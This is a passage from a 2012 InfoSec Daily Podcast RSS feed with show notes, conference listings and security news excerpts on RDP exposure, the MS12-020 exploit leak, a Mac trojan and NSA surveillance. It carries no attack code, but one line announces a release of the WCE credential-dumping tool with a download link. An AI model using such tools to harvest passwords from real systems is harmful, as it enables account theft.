Since it became obvious that a fully functional Remote Desktop Protocol (RDP) exploit code is available, a researcher scanned part of the Internet to determine how many computers communicate using RDP.
Security researcher Dan Kaminsky scanned around 300 million IPs, of which around 414,000 turned out to be potentially exposed to a large-scale attack. Since 300 million IPs represents approximately 8% of the entire Web, the simple conclusion is that up to 5 million devices may be exposed worldwide.
&#160;
Of course, if they communicate using RDP, that doesn&#8217;t necessarily mean they are susceptible because a certain percentage may be patched up and some of them may not even run Microsoft operating systems, but still, the potential number of victims is enormous.
&#160;
&#8220;There&#8217;s something larger going on, and it&#8217;s the relevance of a bug on what can be possibly called the Critical Server Attack Surface,&#8221; Kaminsky wrote on his blog.
&#160;
&#8220;Not all bugs are equally dangerous because not all code is equally deployed. Some flaws are simply more accessible than others, and RDP &#8212; as the primary mechanism by which Windows systems are remotely administered &#8212; is a lot more accessible than a lot of people were aware of.&#8221;
&#8230;.
Source: &#160;http://www.ampliasecurity.com/research/wce_v1_3beta.tgz
	WCE v1.3beta 32bit released. &#160;This version includes some bug fixes as well as it extends support to obtain NTLM hashes without code injection. &#160;Also a much needed feature of allowing for dumps of logins in cleartext for passwords that are stored by the Digest Authentication package.
&#8230;.
Source: &#160;http://www.securelist.com/en/blog/677/The_mystery_of_Duqu_Framework_solved
Kaspersky Lab researchers today announced that with the help of the[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 622 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-622-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-622-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 18 Mar 2012 01:46:53 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3651</guid>
		<description><![CDATA[&#160; Episode 622 -&#160;Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 622 for March 17, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik and Themson Mester. Guests: aricon, oncee, and spridel Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November [...]]]></description>
			<content:encoded><![CDATA[<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Episode 622 -&nbsp;</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Weekend Wrap-up with Dr. b0n3z</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 622 for March 17, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik and Themson Mester.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Guests: aricon, oncee, and spridel</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Social Engineering Training</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Black Hat Vegas</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: &nbsp;Bristol, UK</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: &nbsp;Columbia, MD</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">InfoSec Southwest<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Austin, TX<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">AIDE 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://www.appyide.org/"><span>http://www.appyide.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">LayerOne 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Courtyard Seattle Federal Way, WA<a href="http://www.sans.org/mentor/details.php?nid=28014"><span> <br class="kix-line-break" /><br />
	</span></a></b></p>
<p><b><a href="http://www.sans.org/mentor/details.php?nid=28014"> </a></b></p>
<p><b><a href="http://www.sans.org/mentor/details.php?nid=28014"> <span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	</b></p>
<p><b>Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Defcon 20<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 26-29, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Rio Hotel and Casino &#8211; Las Vegas, NV<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://defcon.org/"><span>http://defcon.org/</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	</span></b></p>
<p><b>Where: Louisville, KY<br class="kix-line-break" /><br />
	</b></p>
<p><b><a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source: </span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&nbsp;</span><a href="http://www.wired.com/threatlevel/2012/03/ff_nsadatacenter/"><span>http://www.wired.com/threatlevel/2012/03/ff_nsadatacenter/</span></a></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">But new pioneers have quietly begun moving into the area, secretive outsiders who say little and keep to themselves. Like the pious polygamists, they are focused on deciphering cryptic messages that only they have the power to understand. Just off Beef Hollow Road, less than a mile from brethren headquarters, thousands of hard-hatted construction workers in sweat-soaked T-shirts are laying the groundwork for the newcomers&rsquo; own temple and archive, a massive complex so large that it necessitated expanding the town&rsquo;s boundaries. Once built, it will be more than five times the size of the US Capitol.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Rather than Bibles, prophets, and worshippers, this temple will be filled with servers, computer intelligence experts, and armed guards. And instead of listening for words flowing down from heaven, these newcomers will be secretly capturing, storing, and analyzing vast quantities of words and images hurtling through the world&rsquo;s telecommunications networks. In the little town of Bluffdale, Big Love and Big Brother have become uneasy neighbors.</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Under construction by contractors with top-secret clearances, the blandly named Utah Data Center is being built for the National Security Agency. A project of immense secrecy, it is the final piece in a complex puzzle assembled over the past decade. Its purpose: to intercept, decipher, analyze, and store vast swaths of the world&rsquo;s communications as they zap down from satellites and zip through the underground and undersea cables of international, foreign, and domestic networks. The heavily fortified $2 billion center should be up and running in September 2013. Flowing through its servers and routers and stored in near-bottomless databases will be all forms of communication, including the complete contents of private emails, cell phone calls, and Google searches, as well as all sorts of personal data trails&mdash;parking receipts, travel itineraries, bookstore purchases, and other digital &ldquo;pocket litter.&rdquo; It is, in some measure, the realization of the &ldquo;total information awareness&rdquo; program created during the first term of the Bush administration&mdash;an effort that was killed by Congress in 2003 after it caused an outcry over its potential for invading Americans&rsquo; privacy.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.pcworld.com/article/251998/thanks_devteam_new_ipad_already_jailbroken_updated.html"><span>http://www.pcworld.com/article/251998/thanks_devteam_new_ipad_already_jailbroken_updated.html</span></a></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">This is perhaps a new record for the Dev-Team: The New Third Generation iPad has been out for less than a day, but the iOS developers have already managed to jailbreak it. Nice going, guys!</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">The jailbreak comes courtesy of &quot;MuscleNerd&quot;, who got in by using Cydia 1.1.5. Of course, there are technically a number of developers to thank here, due to the complexity of hacking devices with A5 processors. Originally, &quot;pod2g&quot; discovered a way of jailbreaking the iPad 2 and iPhone 4s (both of which use A5 processors) untethered&#8211;a jailbreak tool named Absinthe.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">However, shortly after Absinthe was released, Apple announced the new iPad would not only run iOS 5.1, but also that it would be using a brand new A5X processor. While the team rooted the 5.1 updatepretty quickly last week, the iPad 2 and the iPhone 4s were still missed out of the jailbreaking fun. Fortunately, Stefan Esser (aka &quot;i0n1c&quot;) worked his magic and managed to get his iPad 2 running the 5.1 jailbreak, leading to MuscleNerd&#039;s success with the New iPad. Quite the collaborative effort!</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.zdnet.com/blog/security/new-mac-os-x-malware-variant-spotted-in-the-wild/10887"><span>http://www.zdnet.com/blog/security/new-mac-os-x-malware-variant-spotted-in-the-wild/10887</span></a></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">Security researchers from Intego, have intercepted a new variant of the Imuler trojan horse targeting Mac OS X users.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">The latest version of the Imuler.C trojan attempts to trick end and corporate users into thinking that they&rsquo;re downloading and about to view image files. The trojan horse circulates using .zip archives named &ldquo;</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;font-style: italic;vertical-align: baseline">Pictures and the Ariticle of Renzin Dorjee.zip</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&rdquo; and &ldquo;</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;font-style: italic;vertical-align: baseline">FHM Feb Cover Girl Irina Shayk H-Res Pics.zip</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&rdquo;.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">According to the researchers, the malware authors are relying on a known social engineering tactic and the default Mac OS X settings, where full file extensions are not displayed by default, hence the use of image icons for application files.</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.foxnews.com/scitech/2012/03/17/us-isps-become-copyright-cops-starting-july-12/"><span>http://www.foxnews.com/scitech/2012/03/17/us-isps-become-copyright-cops-starting-july-12/</span></a></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Comcast, Cablevision, Verizon, </span><a href="http://www.foxnews.com/topics/studios/time-warner.htm#r_src=ramp"><span>Time Warner</span></a><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline"> Cable and other Internet service providers (ISPs) in the </span><a href="http://www.foxnews.com/topics/u.s.htm#r_src=ramp"><span>United States</span></a><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline"> will soon launch new programs to police their networks in an effort to catch digital pirates and stop illegal file-sharing.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Major ISPs announced last summer that they had agreed to take new measures in an effort to prevent subscribers from illegally downloading copyrighted material, but the specifics surrounding the imminent antipiracy measures were not made available. Now, RIAA chief executive Cary Sherman has said that ISPs are ready to begin their efforts to curtail illegal movie, music and software downloads on July 12.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Customers found to be illegally downloading copyrighted material will first receive one or two notifications from their ISPs, essentially stating that they have been caught. If the illegal downloads continue, subscribers will receive a new notice requesting acknowledgement that the notice has been received. Subsequent offenses can then result in bandwidth throttling and even service suspension.</span><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.zdnet.com/blog/security/microsoft-confirms-mapp-proof-of-concept-exploit-code-leak/10872"><span>http://www.zdnet.com/blog/security/microsoft-confirms-mapp-proof-of-concept-exploit-code-leak/10872</span></a></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">An embarrassing leak within the Microsoft Active Protections Program (MAPP) has led to the publication of proof-of-concept code for a serious security hole in all versions of Windows, Microsoft confirmed late Friday.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">The company&rsquo;s </span><a href="http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx"><span>confirmation</span></a><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline"> of the MAPP leak follows the </span><a href="http://www.zdnet.com/blog/security/exploit-code-published-for-rdp-worm-hole-does-microsoft-have-a-leak/10860"><span>release</span></a><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline"> of code on a Chinese-language forum that provides a roadmap for hackers to launch remote code execution attacks against a flaw in Microsoft&rsquo;s implementation of the RDP protocol.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">According to Yunsun Wee, a director in Microsoft&rsquo;s Trustworthy Computing group, the public public proof-of-concept code results only in denial-of-service crashes against unpatched Windows systems. &ldquo;We continue to watch the threat landscape and we are not aware of public proof-of-concept code that results in remote code execution,&rdquo; Wee added.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 13px;font-family: Verdana;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.cyanogenmod.com/blog/security-and-you"><span>http://www.cyanogenmod.com/blog/security-and-you</span></a></b></p>
<p><b><br />
	<span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">Many of you may not give it a second glance, but among all the furor and concern about permissions requested by market apps and privacy, all Custom ROMs (CyanogenMod included) ship with one major security risk &mdash; root!</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">We have been struggling with how to handle this for quite a bit, and took a first step with the first public CyanogenMod 9 alpha builds, by disabling the previously-default root access over USB. You can still get adb root access by running &ldquo;adb root&rdquo; in terminal, should you ever need it.</span></b></p>
<p><b><span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">We recently merged 3 patches into CyanogenMod 9, to further address this: http://goo.gl/eCjDV http://goo.gl/oWAFI and http://goo.gl/34vai.</span><br />
	<span style="font-size: 13px;font-family: Verdana;font-weight: normal;vertical-align: baseline">&#8230;</span></b></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-622-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3651/0/infosec-daily-podcast-episode-622.mp3" length="17623768" type="audio/mpeg" />
		<itunes:duration>0:36:43</itunes:duration>
		<itunes:subtitle>&#160;
Episode 622 -&#160;Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 622 for March 17, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik and Themson Mester.

	
Guests: aricon, oncee, and spridel

	
Announcem[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 622 -&#160;Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 622 for March 17, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez, Boris Sverdlik and Themson Mester.

	
Guests: aricon, oncee, and spridel

	
Announcements:
Social Engineering Training
When: July 21-24, 2012
	
Where: Black Hat Vegas
When: August 20-24, 2012
	
Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	
Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training

	
InfoSec Southwest
	
When: March 30-April 1
	
Where: Austin, TX
	
http://www.Infosecsouthwest.com

	
Linuxfest Northwest 2012
	
When: Saturday, April 28th-29th, 2012
	
Where: Bellingham Technical College &#8211; Bellingham, WA
	
http://www.linuxfestnorthwest.org/

	
AIDE 2012
	
When: May 21-25, 2012
	
Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	
http://www.appyide.org/

	
LayerOne 2012
	
When: May 26-27, 2012
	
Where: Clarion Hotel &#8211; Anaheim, CA
	
http://www.layerone.org

	
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	
Where: Courtyard Seattle Federal Way, WA 
	
 
 http://www.sans.org/mentor/details.php?nid=28014
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	
When: July 21 &#8211; 22, 2012
	
When: July 23 &#8211; 24, 2012
	
Where: Black Hat Vegas
	
http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html

	
Defcon 20
	
When: July 26-29, 2012
	
Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	
http://defcon.org/

	
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	
When: &#160;September 27-30, 2012
	
Where: Louisville, KY
	
http://www.derbycon.com

	
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.

	
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.wired.com/threatlevel/2012/03/ff_nsadatacenter/

	But new pioneers have quietly begun moving into the area, secretive outsiders who say little and keep to themselves. Like the pious polygamists, they are focused on deciphering cryptic messages that only they have the power to understand. Just off Beef Hollow Road, less than a mile from brethren headquarters, thousands of hard-hatted construction workers in sweat-soaked T-shirts are laying the groundwork for the newcomers&#8217; own temple and archive, a massive complex so large that it necessitated expanding the town&#8217;s boundaries. Once built, it will be more than five times the size of the US Capitol.
Rather than Bibles, prophets, and worshippers, this temple will be filled with servers, computer intelligence experts, and armed guards. And instead of listening for words flowing down from heaven, these newcomers will be secretly capturing, storing, and analyzing vast quantities of words and images hurtling through the world&#8217;s telecommunications networks. In the little town of Bluffdale, Big Love and Big Brother have become uneasy neighbors.
	
Under construction by contractors with top-secret clearances, the blandly named Utah Data Center is being built for the National Security Agency. A project of immense secrecy, it is the final piece in a complex puzzle assembled over the past decade. Its purpose: to intercept, decipher, analyze, and store vast swaths of the world&#8217;s communications as they zap down from satellites and zip through the underground and undersea cables of international, foreign, and domestic networks. The heavily fortified $2 billion center should be up and running in September 2013. Flowing through its servers and routers and stored in near-bottomless databases will be all forms of communication, including the complete contents of private emails, cell phone calls, and G[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 621 &#8211; BSides WTF?, MS12-020 Exploit, Anit-SourceForge, 130M Scams, You Logo, Fake Google Play and GeoPot</title>
		<link>http://www.isdpodcast.com/episode-621-bsides-wtf-ms12-020-exploit-anit-sourceforge-130m-scams-you-logo-fake-google-play-and-geopot</link>
		<comments>http://www.isdpodcast.com/episode-621-bsides-wtf-ms12-020-exploit-anit-sourceforge-130m-scams-you-logo-fake-google-play-and-geopot#comments</comments>
		<pubDate>Sat, 17 Mar 2012 01:07:55 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3647</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 621 for March 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Social Engineering Training When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD http://www.social-engineer.com/social-engineer-training &#160; InfoSec Southwest When: [...]]]></description>
